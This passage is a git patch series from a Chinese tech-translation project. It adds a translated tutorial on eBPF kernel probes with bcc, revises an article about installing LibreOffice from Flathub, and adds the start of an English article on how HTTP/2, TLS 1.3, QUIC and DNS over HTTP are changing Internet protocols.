-[8]:https://lwn.net/Articles/604043/ -[9]:http://lxr.free-electrons.com/source/kernel/bpf/verifier.c#L21 -[10]:http://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf -[11]:https://github.com/iovisor/bcc -[12]:https://github.com/iovisor/bcc/blob/master/INSTALL.md -[13]:http://lxr.free-electrons.com/source/net/ipv4/af_inet.c#L194 -[14]:https://github.com/iovisor/bcc/pull/453 -[15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 -[16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py -[17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html - - diff --git a/translated/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/translated/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md new file mode 100644 index 0000000000..0951ae4da0 --- /dev/null +++ b/translated/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md @@ -0,0 +1,363 @@ +怎么去转换任何系统调用为一个事件:介绍 eBPF 内核探针 +============================================================ + + +长文预警:在最新的 Linux 内核(>=4.4)中使用 eBPF,你可以使用任意数据将任何内核函数调用转换为一个用户空间事件。这通过 bcc 来做很容易。这个探针是用 C 语言写的,而数据是由 Python 来处理的。 + +如果你对 eBPF 或者 Linux 跟踪不熟悉,那你应该好好阅读一下本文。它尝试逐步去克服我在使用 bcc/eBPF 时遇到的困难,同时也节省了我在搜索和挖掘上花费的时间。 + +### 在 Linux 的世界中关于 push vs pull 的一个提示 + +当我开始在容器上工作的时候,我想知道我们怎么基于一个真实的系统状态去动态更新一个负载均衡器的配置。一个通用的策略是这样做的,无论什么时候只要一个容器启动,容器编排器触发一个负载均衡配置更新动作,负载均衡器去轮询每个容器,直到它的健康状态检查结束。它只是简单进行 “SYN” 测试。 + +虽然这种配置方式可以有效工作,但是它的缺点是你的负载均衡器为了让一些系统变得可用需要等待,而不是 … 让负载去均衡。 + +可以做的更好吗? + +当你希望在一个系统中让一个程序对一些变化做出反应,这里有两种可能的策略。程序可以去 _轮询_  系统去检测变化,或者,如果系统支持,系统可以  _推送_ 事件并且让程序对它作出反应。你希望去使用推送还是轮询取决于上下文环境。一个好的经验法则是,基于处理时间的考虑,如果事件发生的频率较低时使用推送,而当事件发生的较快或者让系统变得不可用时切换为轮询。例如,一般情况下,网络驱动将等待来自网卡的事件,但是,像 dpdk 这样的框架对事件将激活对网卡的轮询,以达到高吞吐低延迟的目的。 + +理想状态下,我们将有一些内核接口告诉我们: + +> * “容器管理器,你好,我刚才为容器 _servestaticfiles_ 的 Nginx-ware 创建了一个套接字,或许你应该去更新你的状态? +> +> * “好的,操作系统,感谢你告诉我这个事件“ + +虽然 Linux 有大量的接口去处理事件,对于文件事件高达 3 个,但是没有专门的接口去得到套接字事件提示。你可以得到路由表事件、邻接表事件、连接跟踪事件、接口变化事件。唯独没有套接字事件。或者,也许它深深地隐藏在一个 Netlink 接口中。 + +理想情况下,我们需要一个做这件事的通用方法,怎么办呢? + +### 内核跟踪和 eBPF,一些它们的历史 + +直到最近,仅有的方式是去在内核上打一个补丁程序或者借助于 SystemTap。[SytemTap][5] 是一个 Linux 系统跟踪器。简单地说,它提供了一个 DSL,然后编译进内核模块,然后被内核加载运行。除了一些因安全原因禁用动态模块加载的生产系统之外,包括在那个时候我工作的那一个。另外的方式是为内核打一个补丁程序去触发一些事件,可能是基于 netlink。但是这很不方便。深入内核带来的缺点包括 “有趣的” 新 “特性” 和增加了维护负担。 + +从 Linux 3.15 开始给我们带来了希望,它支持任何可跟踪内核函数可安全转换为用户空间事件。在一般的计算机科学中,“安全” 是指 ”一些虚拟机”。这里说的情况不是这种意思。Linux 已经有多好年了。自从 Linux 2.1.75 在 1997 年正式发行以来。但是,对被称为伯克利包过滤器的 BPF 来说它的历史是很短的。正如它的名字所表达的那样,它最初是为 BSD 防火墙开发的。它仅有两个寄存器,并且它仅允许跳转,意味着你不能使用它写一个循环(好吧,如果你知道最大迭代次数并且去手工实现它,你也可以实现循环)。这一点保证了程序总会终止并且从来不会使系统处于 hang 的状态。还不确定它的作用吗?即便你用的是 iptables。它的作用正如 [CloudFlare 的 DDos 防护基础][6]。 + +好的,因此,随着 Linux 3.15,[BPF 被扩展了][7] 转变为 eBPF。对于 “扩展的” BPF。它从两个 32 位寄存器升级到 10 个 64 位寄存器,并且增加了它们之间向后跳转的特性。它因此将被 [在 Linux 3.18 中进一步扩展][8],并将被移到网络子系统中,并且增加了像映射(maps)这样的工具。为保证安全,它 [引进了一个检查器][9],它验证所有的内存访问和可能的代码路径。如果检查器不能保证代码在固定的边界内,代码将被终止,它拒绝程序的初始插入。 + +关于它的更多历史,可以看 [Oracle 的关于 eBPF 的一个很捧的演讲][10]。 + +让我们开始吧! + +### 来自 `inet_listen` 的问候 + +因为写一个汇编程序并不是件容易的任务,甚至对于很优秀的我们来说,我将使用 [bcc][11]。bcc 是一个基于 LLVM 的采集工具,并且用 Python 抽象了底层机制。探针是用 C 写的,并且返回的结果可以被 Python 利用,来写一些非常简单的应用程序。 + +首先安装 bcc。对于一些示例,你可能会被要求使用一个最新的内核版本(>= 4.4)。如果你想亲自去尝试一下这些示例,我强烈推荐你安装一台虚拟机。 _而不是_ 一个 Docker 容器。你不能在一个容器中改变内核。作为一个非常新的很活跃的项目,安装教程高度依赖平台/版本的。你可以在 [https://github.com/iovisor/bcc/blob/master/INSTALL.md][12] 上找到最新的教程。 + +现在,我希望在 TCP 套接字上进行监听,不管什么时候,只要有任何程序启动我将得到一个事件。当我在一个 `AF_INET` + `SOCK_STREAM` 套接字上调用一个 `listen()` 系统调用时,底层的内核函数是 [`inet_listen`][13]。我将钩在 `kprobe` 的输入点上,它启动时输出一个 “Hello World”。 + +``` +from bcc import BPF + +# Hello BPF Program +bpf_text = """ +#include +#include + +// 1\. Attach kprobe to "inet_listen" +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + bpf_trace_printk("Hello World!\\n"); + return 0; +}; +""" + +# 2\. Build and Inject program +b = BPF(text=bpf_text) + +# 3\. Print debug output +while True: + print b.trace_readline() + +``` + +这个程序做了三件事件:1. 它使用一个命名惯例附加到一个内核探针上。如果函数被调用,输出 “my_probe”,它使用 `b.attach_kprobe("inet_listen", "my_probe")` 被显式地附加。2.它使用 LLVM 去 new 一个 BPF 后端来构建程序。使用 (new) `bpf()` 系统调用去注入结果字节码,并且按匹配的命名惯例自动附加探针。3. 从内核管道读取原生输出。 + +注意:eBPF 的后端 LLVM 还很新。如果你认为你发了一个 bug,你可以去升级它。 + +注意到 `bpf_trace_printk` 调用了吗?这是一个内核的 `printk()` 精简版的 debug 函数。使用时,它产生一个跟踪信息到 `/sys/kernel/debug/tracing/trace_pipe` 中的专门的内核管道。就像名字所暗示的那样,这是一个管道。如果多个读取者消费它,仅有一个将得到一个给定的行。对生产系统来说,这样是不合适的。 + +幸运的是,Linux 3.19 引入了对消息传递的映射以及 Linux 4.4 带来了任意 perf 事件支持。在这篇文章的后面部分,我将演示 perf 事件。 + +``` +# From a first console +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py + nc-4940 [000] d... 22666.991714: : Hello World! + +# From a second console +ubuntu@bcc:~$ nc -l 0 4242 +^C + +``` + +Yay! + +### 抓取 backlog + +现在,让我们输出一些很容易访问到的数据,叫做 “backlog”。backlog 是正在建立 TCP 连接的、即将成为 `accept()` 的数量。 + +只要稍微调整一下 `bpf_trace_printk`: + +``` +bpf_trace_printk("Listening with with up to %d pending connections!\\n", backlog); + +``` + +如果你用这个 “革命性” 的改善重新运行这个示例,你将看到如下的内容: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5020 [000] d... 25497.154070: : Listening with with up to 1 pending connections! + +``` + +`nc` 是一个单个的连接程序,因此,在 1\. Nginx 或者 Redis 上的 backlog 在这里将输出 128 。但是,那是另外一件事。 + +简单吧?现在让我们获取它的端口。 + +### 抓取端口和 IP + +正在研究的 `inet_listen` 的信息来源于内核,我们知道它需要从 `socket` 对象中取得 `inet_sock`。就像从源头拷贝,然后插入到跟踪器的开始处: + +``` +// cast types. Intermediate cast not needed, kept for readability +struct sock *sk = sock->sk; +struct inet_sock *inet = inet_sk(sk); + +``` + +端口现在可以在按网络字节顺序(就是“从小到大”的顺序)的 `inet->inet_sport` 访问到。很容易吧!因此,我们将替换为 `bpf_trace_printk`: + +``` +bpf_trace_printk("Listening on port %d!\\n", inet->inet_sport); + +``` + +然后运行: + +``` +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py +... +R1 invalid mem access 'inv' +... +Exception: Failed to load BPF program kprobe__inet_listen + +``` + +除了它不再简单之外,Bcc 现在提升了 _许多_。直到写这篇文章的时候,几个问题已经被处理了,但是并没有全部处理完。这个错误意味着内核检查器可以证实程序中的内存访问是正确的。看显式的类型转换。我们需要一点帮助,以使访问更加明确。我们将使用 `bpf_probe_read` 可信任的函数去读取一个任意内存位置,虽然为了确保,要像如下的那样做一些必需的检查: + +``` +// Explicit initialization. The "=0" part is needed to "give life" to the variable on the stack +u16 lport = 0; + +// Explicit arbitrary memory access. Read it: +// Read into 'lport', 'sizeof(lport)' bytes from 'inet->inet_sport' memory location +bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + +``` + +使用 `inet->inet_rcv_saddr` 读取 IPv4 边界地址,和它基本上是相同的。如果我把这些一起放上去,我们将得到 backlog,端口和边界 IP: + +``` +from bcc import BPF + +# BPF Program +bpf_text = """ +#include +#include +#include + +// Send an event for each IPv4 listen with PID, bound address and port +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + // Cast types. Intermediate cast not needed, kept for readability + struct sock *sk = sock->sk; + struct inet_sock *inet = inet_sk(sk); + + // Working values. You *need* to initialize them to give them "life" on the stack and use them afterward + u32 laddr = 0; + u16 lport = 0; + + // Pull in details. As 'inet_sk' is internally a type cast, we need to use 'bpf_probe_read' + // read: load into 'laddr' 'sizeof(laddr)' bytes from address 'inet->inet_rcv_saddr' + bpf_probe_read(&laddr, sizeof(laddr), &(inet->inet_rcv_saddr)); + bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + + // Push event + bpf_trace_printk("Listening on %x %d with %d pending connections\\n", ntohl(laddr), ntohs(lport), backlog); + return 0; +}; +""" + +# Build and Inject BPF +b = BPF(text=bpf_text) + +# Print debug output +while True: + print b.trace_readline() + +``` + +运行一个测试,输出的内容像下面这样: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5024 [000] d... 25821.166286: : Listening on 7f000001 4242 with 1 pending connections + +``` + +你的监听是在本地主机上提供的。因为没有处理为友好的输出,这里的地址以 16 进制的方式显示,并且那是有线的。并且它很酷。 + +注意:你可能想知道为什么 `ntohs` 和 `ntohl` 可以从 BPF 中被调用,即便它们并不可信。这是因为它们是宏,并且是从 “.h” 文件中来的内联函数,并且,在写这篇文章的时候一个小的 bug 已经 [修复了][14]。 + +全部完成之后,再来一个代码片断:我们希望获取相关的容器。在一个网络环境中,那意味着我们希望取得网络的命名空间。网络命名空间是一个容器的构建块,它允许它们拥有独立的网络。 + +### 抓取网络命名空间:被迫引入的 perf 事件 + +在用户空间中,网络命名空间可以通过检查 `/proc/PID/ns/net` 的目标来确定,它将看起来像 `net:[4026531957]` 这样。方括号中的数字是节点的网络空间编号。这就是说,我们可以通过 `/proc` 来取得,但是这并不是好的方式,我们或许可以临时处理时用一下。我们可以从内核中直接抓取节点编号。幸运的是,那样做很容易: + +``` +// Create an populate the variable +u32 netns = 0; + +// Read the netns inode number, like /proc does +netns = sk->__sk_common.skc_net.net->ns.inum; + +``` + +很容易!而且它做到了。 + +但是,如果你看到这里,你可能猜到那里有一些错误。它在: + +``` +bpf_trace_printk("Listening on %x %d with %d pending connections in container %d\\n", ntohl(laddr), ntohs(lport), backlog, netns); + +``` + +如果你尝试去运行它,你将看到一些令人难解的错误信息: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +error: in function kprobe__inet_listen i32 (%struct.pt_regs*, %struct.socket*, i32) +too many args to 0x1ba9108: i64 = Constant<6> + +``` + +clang 想尝试去告诉你的是 “Hey pal,`bpf_trace_printk` 只能带四个参数,你刚才给它传递了 5 个“。在这里我不打算继续追究细节了,但是,那是 BPF 的一个限制。如果你想继续去深入研究,[这里是一个很好的起点][15]。 + +去修复它的唯一方式是去 … 停止调试并且准备投入使用。因此,让我们开始吧(确保运行在内核版本为 4.4 的 Linux 系统上)我将使用 perf 事件,它支持传递任意大小的结构体到用户空间。另外,只有我们的读者可以获得它,因此,多个没有关系的 eBPF 程序可以并发产生数据而不会出现问题。 + +去使用它吧,我们需要: + +1. 定义一个结构体 + +2. 声明事件 + +3. 推送事件 + +4. 在 Python 端重新声明事件(这一步以后将不再需要) + +5. 消费和格式化事件 + +这看起来似乎很多,其它并不多,看下面示例: + +``` +// At the begining of the C program, declare our event +struct listen_evt_t { + u64 laddr; + u64 lport; + u64 netns; + u64 backlog; +}; +BPF_PERF_OUTPUT(listen_evt); + +// In kprobe__inet_listen, replace the printk with +struct listen_evt_t evt = { + .laddr = ntohl(laddr), + .lport = ntohs(lport), + .netns = netns, + .backlog = backlog, +}; +listen_evt.perf_submit(ctx, &evt, sizeof(evt)); + +``` + +Python 端将需要一点更多的工作: + +``` +# We need ctypes to parse the event structure +import ctypes + +# Declare data format +class ListenEvt(ctypes.Structure): + _fields_ = [ + ("laddr", ctypes.c_ulonglong), + ("lport", ctypes.c_ulonglong), + ("netns", ctypes.c_ulonglong), + ("backlog", ctypes.c_ulonglong), + ] + +# Declare event printer +def print_event(cpu, data, size): + event = ctypes.cast(data, ctypes.POINTER(ListenEvt)).contents + print("Listening on %x %d with %d pending connections in container %d" % ( + event.laddr, + event.lport, + event.backlog, + event.netns, + )) + +# Replace the event loop +b["listen_evt"].open_perf_buffer(print_event) +while True: + b.kprobe_poll() + +``` + +来试一下吧。在这个示例中,我有一个 redis 运行在一个 Docker 容器中,并且 nc 在主机上: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 7f000001 6588 with 1 pending connections in container 4026531957 + +``` + +### 结束语 + +现在,所有事情都可以在内核中使用 eBPF 将任何函数的调用设置为触发事件,并且在学习 eBPF 时,你将看到了我所遇到的大多数的问题。如果你希望去看这个工具的所有版本,像 IPv6 支持这样的一些技巧,看一看 [https://github.com/iovisor/bcc/blob/master/tools/solisten.py][16]。它现在是一个官方的工具,感谢 bcc 团队的支持。 + +更进一步地去学习,你可能需要去关注 Brendan Gregg 的博客,尤其是 [关于 eBPF 映射和统计的文章][17]。他是这个项目的主要贡献人之一。 + + +-------------------------------------------------------------------------------- + +via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/ + +作者:[Jean-Tiare Le Bigot][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.yadutaf.fr/about +[1]:https://blog.yadutaf.fr/tags/linux +[2]:https://blog.yadutaf.fr/tags/tracing +[3]:https://blog.yadutaf.fr/tags/ebpf +[4]:https://blog.yadutaf.fr/tags/bcc +[5]:https://en.wikipedia.org/wiki/SystemTap +[6]:https://blog.cloudflare.com/bpf-the-forgotten-bytecode/ +[7]:https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/TODO +[8]:https://lwn.net/Articles/604043/ +[9]:http://lxr.free-electrons.com/source/kernel/bpf/verifier.c#L21 +[10]:http://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf +[11]:https://github.com/iovisor/bcc +[12]:https://github.com/iovisor/bcc/blob/master/INSTALL.md +[13]:http://lxr.free-electrons.com/source/net/ipv4/af_inet.c#L194 +[14]:https://github.com/iovisor/bcc/pull/453 +[15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 +[16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py +[17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html + + From f8804f212b22163ea96a5755f5f15551f81c527e Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 13 Dec 2017 15:39:20 +0800 Subject: [PATCH 0529/1627] PRF&PUB:20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @geekpi --- ...ilable on Flathub the Flatpak App Store.md | 37 ++++++++++--------- 1 file changed, 20 insertions(+), 17 deletions(-) rename {translated/tech => published}/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md (68%) diff --git a/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/published/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md similarity index 68% rename from translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md rename to published/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md index 4edb744098..d4de978b38 100644 --- a/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md +++ b/published/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @@ -1,27 +1,22 @@ -# LibreOffice 现在在 Flatpak 的 Flathub 应用商店提供 +LibreOffice 上架 Flathub 应用商店 +=============== ![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) -LibreOffice 现在可以从集中化的 Flatpak 应用商店 [Flathub][3] 进行安装。 +> LibreOffice 现在可以从集中化的 Flatpak 应用商店 [Flathub][3] 进行安装。 -它的到来使任何运行现代 Linux 发行版的人都能只点击一两次安装 LibreOffice 的最新稳定版本,而无需搜索 PPA,纠缠 tar 包或等待发行商将其打包。 +它的到来使任何运行现代 Linux 发行版的人都能只点击一两次即可安装 LibreOffice 的最新稳定版本,而无需搜索 PPA,纠缠于 tar 包或等待发行版将其打包。 -自去年 8 月份以来,[LibreOffice Flatpak][5] 已经可供用户下载和安装 [LibreOffice 5.2][6]。 +自去年 8 月份 [LibreOffice 5.2][6] 发布以来,[LibreOffice Flatpak][5] 已经可供用户下载和安装。 -这里“新”的是发行方法。文档基金会选择使用 Flathub 而不是专门的服务器来发布更新。 +这里“新”的是指发行方法。文档基金会Document Foundation选择使用 Flathub 而不是专门的服务器来发布更新。 -这对于终端用户来说是一个_很好_的消息,因为这意味着不需要在新安装时担心仓库,但对于 Flatpak 的倡议者来说也是一个好消息:LibreOffice 是开源软件最流行的生产力套件。它对格式和应用商店的支持肯定会受到热烈的欢迎。 +这对于终端用户来说是一个_很好_的消息,因为这意味着不需要在新安装时担心仓库,但对于 Flatpak 的倡议者来说也是一个好消息:LibreOffice 是开源软件里最流行的生产力套件。它对该格式和应用商店的支持肯定会受到热烈的欢迎。 在撰写本文时,你可以从 Flathub 安装 LibreOffice 5.4.2。新的稳定版本将在发布时添加。 ### 在 Ubuntu 上启用 Flathub -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) - -Fedora、Arch 和 Linux Mint 18.3 用户已经安装了 Flatpak,随时可以开箱即用。Mint 甚至预启用了 Flathub remote。 - -[从 Flathub 安装 LibreOffice][7] - 要在 Ubuntu 上启动并运行 Flatpak,首先必须安装它: ``` @@ -34,17 +29,25 @@ sudo apt install flatpak gnome-software-plugin-flatpak flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo ``` -这就行了。只需注销并返回(以便 Ubuntu Software 刷新其缓存),之后你应该能够通过 Ubuntu Software 看到 Flathub 上的任何 Flatpak 程序了。 +这就行了。只需注销并重新登录(以便 Ubuntu Software 刷新其缓存),之后你应该能够通过 Ubuntu Software 看到 Flathub 上的任何 Flatpak 程序了。 + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) + +*Fedora、Arch 和 Linux Mint 18.3 用户已经安装了 Flatpak,随时可以开箱即用。Mint 甚至预启用了 Flathub remote。* 在本例中,搜索 “LibreOffice” 并在结果中找到下面有 Flathub 提示的结果。(请记住,Ubuntu 已经调整了客户端,来将 Snap 程序显示在最上面,所以你可能需要向下滚动列表来查看它)。 +### 从 Flathub 安装 LibreOffice + +- [从 Flathub 安装 LibreOffice][7] + 从 flatpakref 中[安装 Flatpak 程序有一个 bug][8],所以如果上面的方法不起作用,你也可以使用命令行从 Flathub 中安装 Flathub 程序。 Flathub 网站列出了安装每个程序所需的命令。切换到“命令行”选项卡来查看它们。 -#### Flathub 上更多的应用 +### Flathub 上更多的应用 -如果你经常看这个网站,你就会知道我喜欢 Flathub。这是我最喜欢的一些应用(Corebird、Parlatype、GNOME MPV、Peek、Audacity、GIMP 等)的家园。我无需折衷就能获得这些应用程序的最新,稳定版本(加上它们需要的所有依赖)。 +如果你经常看这个网站,你就会知道我喜欢 Flathub。这是我最喜欢的一些应用(Corebird、Parlatype、GNOME MPV、Peek、Audacity、GIMP 等)的家园。我无需等待就能获得这些应用程序的最新、稳定版本(加上它们需要的所有依赖)。 而且,在我 twiiter 上发布一周左右后,大多数 Flatpak 应用现在看起来有很棒 GTK 主题 - 不再需要[临时方案][9]了! @@ -52,9 +55,9 @@ Flathub 网站列出了安装每个程序所需的命令。切换到“命令行 via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store -作者:[ JOEY SNEDDON ][a] +作者:[JOEY SNEDDON][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 077310856ada760861ca1b0fb2e1b372c27d7b3f Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 13 Dec 2017 18:31:31 +0800 Subject: [PATCH 0530/1627] =?UTF-8?q?20171213-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0171212 Internet protocols are changing.md | 176 ++++++++++++++++++ 1 file changed, 176 insertions(+) create mode 100644 sources/tech/20171212 Internet protocols are changing.md diff --git a/sources/tech/20171212 Internet protocols are changing.md b/sources/tech/20171212 Internet protocols are changing.md new file mode 100644 index 0000000000..c95e8c732c --- /dev/null +++ b/sources/tech/20171212 Internet protocols are changing.md @@ -0,0 +1,176 @@ +Internet protocols are changing +============================================================ + + +![](https://blog.apnic.net/wp-content/uploads/2017/12/evolution-555x202.png) + +When the Internet started to become widely used in the 1990s, most traffic used just a few protocols: IPv4 routed packets, TCP turned those packets into connections, SSL (later TLS) encrypted those connections, DNS named hosts to connect to, and HTTP was often the application protocol using it all. + +For many years, there were negligible changes to these core Internet protocols; HTTP added a few new headers and methods, TLS slowly went through minor revisions, TCP adapted congestion control, and DNS introduced features like DNSSEC. The protocols themselves looked about the same ‘on the wire’ for a very long time (excepting IPv6, which already gets its fair amount of attention in the network operator community.) + +As a result, network operators, vendors, and policymakers that want to understand (and sometimes, control) the Internet have adopted a number of practices based upon these protocols’ wire ‘footprint’ — whether intended to debug issues, improve quality of service, or impose policy. + +Now, significant changes to the core Internet protocols are underway. While they are intended to be compatible with the Internet at large (since they won’t get adoption otherwise), they might be disruptive to those who have taken liberties with undocumented aspects of protocols or made an assumption that things won’t change. + +#### Why we need to change the Internet + +There are a number of factors driving these changes. + +First, the limits of the core Internet protocols have become apparent, especially regarding performance. Because of structural problems in the application and transport protocols, the network was not being used as efficiently as it could be, leading to end-user perceived performance (in particular, latency). + +This translates into a strong motivation to evolve or replace those protocols because there is a [large body of experience showing the impact of even small performance gains][14]. + +Second, the ability to evolve Internet protocols — at any layer — has become more difficult over time, largely thanks to the unintended uses by networks discussed above. For example, HTTP proxies that tried to compress responses made it more difficult to deploy new compression techniques; TCP optimization in middleboxes made it more difficult to deploy improvements to TCP. + +Finally, [we are in the midst of a shift towards more use of encryption on the Internet][15], first spurred by Edward Snowden’s revelations in 2015\. That’s really a separate discussion, but it is relevant here in that encryption is one of best tools we have to ensure that protocols can evolve. + +Let’s have a look at what’s happened, what’s coming next, how it might impact networks, and how networks impact protocol design. + +#### HTTP/2 + +[HTTP/2][16] (based on Google’s SPDY) was the first notable change — standardized in 2015, it multiplexes multiple requests onto one TCP connection, thereby avoiding the need to queue requests on the client without blocking each other. It is now widely deployed, and supported by all major browsers and web servers. + +From a network’s viewpoint, HTTP/2 made a few notable changes. First, it’s a binary protocol, so any device that assumes it’s HTTP/1.1 is going to break. + +That breakage was one of the primary reasons for another big change in HTTP/2; it effectively requires encryption. This gives it a better chance of avoiding interference from intermediaries that assume it’s HTTP/1.1, or do more subtle things like strip headers or block new protocol extensions — both things that had been seen by some of the engineers working on the protocol, causing significant support problems for them. + +[HTTP/2 also requires TLS/1.2 to be used when it is encrypted][17], and [blacklists ][18]cipher suites that were judged to be insecure — with the effect of only allowing ephemeral keys. See the TLS 1.3 section for potential impacts here. + +Finally, HTTP/2 allows more than one host’s requests to be [coalesced onto a connection][19], to improve performance by reducing the number of connections (and thereby, congestion control contexts) used for a page load. + +For example, you could have a connection for www.example.com, but also use it for requests for images.example.com. [Future protocol extensions might also allow additional hosts to be added to the connection][20], even if they weren’t listed in the original TLS certificate used for it. As a result, assuming that the traffic on a connection is limited to the purpose it was initiated for isn’t going to apply. + +Despite these changes, it’s worth noting that HTTP/2 doesn’t appear to suffer from significant interoperability problems or interference from networks. + +#### TLS 1.3 + +[TLS 1.3][21] is just going through the final processes of standardization and is already supported by some implementations. + +Don’t be fooled by its incremental name; this is effectively a new version of TLS, with a much-revamped handshake that allows application data to flow from the start (often called ‘0RTT’). The new design relies upon ephemeral key exchange, thereby ruling out static keys. + +This has caused concern from some network operators and vendors — in particular those who need visibility into what’s happening inside those connections. + +For example, consider the datacentre for a bank that has regulatory requirements for visibility. By sniffing traffic in the network and decrypting it with the static keys of their servers, they can log legitimate traffic and identify harmful traffic, whether it be attackers from the outside or employees trying to leak data from the inside. + +TLS 1.3 doesn’t support that particular technique for intercepting traffic, since it’s also [a form of attack that ephemeral keys protect against][22]. However, since they have regulatory requirements to both use modern encryption protocols and to monitor their networks, this puts those network operators in an awkward spot. + +There’s been much debate about whether regulations require static keys, whether alternative approaches could be just as effective, and whether weakening security for the entire Internet for the benefit of relatively few networks is the right solution. Indeed, it’s still possible to decrypt traffic in TLS 1.3, but you need access to the ephemeral keys to do so, and by design, they aren’t long-lived. + +At this point it doesn’t look like TLS 1.3 will change to accommodate these networks, but there are rumblings about creating another protocol that allows a third party to observe what’s going on— and perhaps more — for these use cases. Whether that gets traction remains to be seen. + +#### QUIC + +During work on HTTP/2, it became evident that TCP has similar inefficiencies. Because TCP is an in-order delivery protocol, the loss of one packet can prevent those in the buffers behind it from being delivered to the application. For a multiplexed protocol, this can make a big difference in performance. + +[QUIC][23] is an attempt to address that by effectively rebuilding TCP semantics (along with some of HTTP/2’s stream model) on top of UDP. Like HTTP/2, it started as a Google effort and is now in the IETF, with an initial use case of HTTP-over-UDP and a goal of becoming a standard in late 2018\. However, since Google has already deployed QUIC in the Chrome browser and on its sites, it already accounts for more than 7% of Internet traffic. + +Read [Your questions answered about QUIC][24] + +Besides the shift from TCP to UDP for such a sizable amount of traffic (and all of the adjustments in networks that might imply), both Google QUIC (gQUIC) and IETF QUIC (iQUIC) require encryption to operate at all; there is no unencrypted QUIC. + +iQUIC uses TLS 1.3 to establish keys for a session and then uses them to encrypt each packet. However, since it’s UDP-based, a lot of the session information and metadata that’s exposed in TCP gets encrypted in QUIC. + +In fact, iQUIC’s current [‘short header’][25] — used for all packets except the handshake — only exposes a packet number, an optional connection identifier, and a byte of state for things like the encryption key rotation schedule and the packet type (which might end up encrypted as well). + +Everything else is encrypted — including ACKs, to raise the bar for [traffic analysis][26] attacks. + +However, this means that passively estimating RTT and packet loss by observing connections is no longer possible; there isn’t enough information. This lack of observability has caused a significant amount of concern by some in the operator community, who say that passive measurements like this are critical for debugging and understanding their networks. + +One proposal to meet this need is the ‘[Spin Bit][27]‘ — a bit in the header that flips once a round trip, so that observers can estimate RTT. Since it’s decoupled from the application’s state, it doesn’t appear to leak any information about the endpoints, beyond a rough estimate of location on the network. + +#### DOH + +The newest change on the horizon is DOH — [DNS over HTTP][28]. A [significant amount of research has shown that networks commonly use DNS as a means of imposing policy][29] (whether on behalf of the network operator or a greater authority). + +Circumventing this kind of control with encryption has been [discussed for a while][30], but it has a disadvantage (at least from some standpoints) — it is possible to discriminate it from other traffic; for example, by using its port number to block access. + +DOH addresses that by piggybacking DNS traffic onto an existing HTTP connection, thereby removing any discriminators. A network that wishes to block access to that DNS resolver can only do so by blocking access to the website as well. + +For example, if Google was to deploy its [public DNS service over DOH][31]on www.google.com and a user configures their browser to use it, a network that wants (or is required) to stop it would have to effectively block all of Google (thanks to how they host their services). + +DOH has just started its work, but there’s already a fair amount of interest in it, and some rumblings of deployment. How the networks (and governments) that use DNS to impose policy will react remains to be seen. + +Read [IETF 100, Singapore: DNS over HTTP (DOH!)][1] + +#### Ossification and grease + +To return to motivations, one theme throughout this work is how protocol designers are increasingly encountering problems where networks make assumptions about traffic. + +For example, TLS 1.3 has had a number of last-minute issues with middleboxes that assume it’s an older version of the protocol. gQUIC blacklists several networks that throttle UDP traffic, because they think that it’s harmful or low-priority traffic. + +When a protocol can’t evolve because deployments 